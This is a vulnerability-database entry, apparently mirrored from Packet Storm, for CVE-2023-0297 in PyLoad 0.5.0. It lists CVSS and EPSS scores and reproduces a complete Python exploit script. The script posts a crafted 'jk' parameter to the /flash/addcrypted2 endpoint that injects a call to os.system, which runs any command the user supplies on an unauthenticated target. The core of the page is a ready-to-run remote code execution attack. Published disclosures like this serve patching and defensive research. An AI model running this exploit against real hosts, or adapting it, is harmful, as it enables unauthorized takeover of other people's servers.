Lucene search

K
packetstormGabriel LimaPACKETSTORM:172914
HistoryJun 15, 2023 - 12:00 a.m.

PyLoad 0.5.0 Remote Code Execution

2023-06-1500:00:00
Gabriel Lima
packetstormsecurity.com
215

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.262 Low

EPSS

Percentile

96.1%

`# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)  
# Date: 06-10-2023  
# Credits: bAu @bauh0lz   
# Exploit Author: Gabriel Lima (0xGabe)  
# Vendor Homepage: https://pyload.net/  
# Software Link: https://github.com/pyload/pyload  
# Version: 0.5.0  
# Tested on: Ubuntu 20.04.6  
# CVE: CVE-2023-0297  
  
import requests, argparse  
  
parser = argparse.ArgumentParser()  
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')  
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')  
arguments = parser.parse_args()  
  
def doRequest(url):  
try:  
res = requests.get(url)  
if res.status_code == 200:  
return True  
else:  
return False  
  
except requests.exceptions.RequestException as e:  
print("[!] Maybe the host is offline :", e)  
exit()  
  
def runExploit(url, cmd):  
endpoint = url + '/flash/addcrypted2'  
if " " in cmd:  
validCommand = cmd.replace(" ", "%20")  
else:  
validCommand = cmd  
  
payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'  
test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)  
print('[+] The exploit has be executeded in target machine. ')  
  
def main(targetUrl, Command):  
print('[+] Check if target host is alive: ' + targetUrl)  
alive = doRequest(targetUrl)  
if alive == True:  
print("[+] Host up, let's exploit! ")  
runExploit(targetUrl,Command)  
else:  
print('[-] Host down! ')  
  
if(arguments.url != None and arguments.cmd != None):  
targetUrl = arguments.url  
Command = arguments.cmd  
main(targetUrl, Command)  
  
  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.262 Low

EPSS

Percentile

96.1%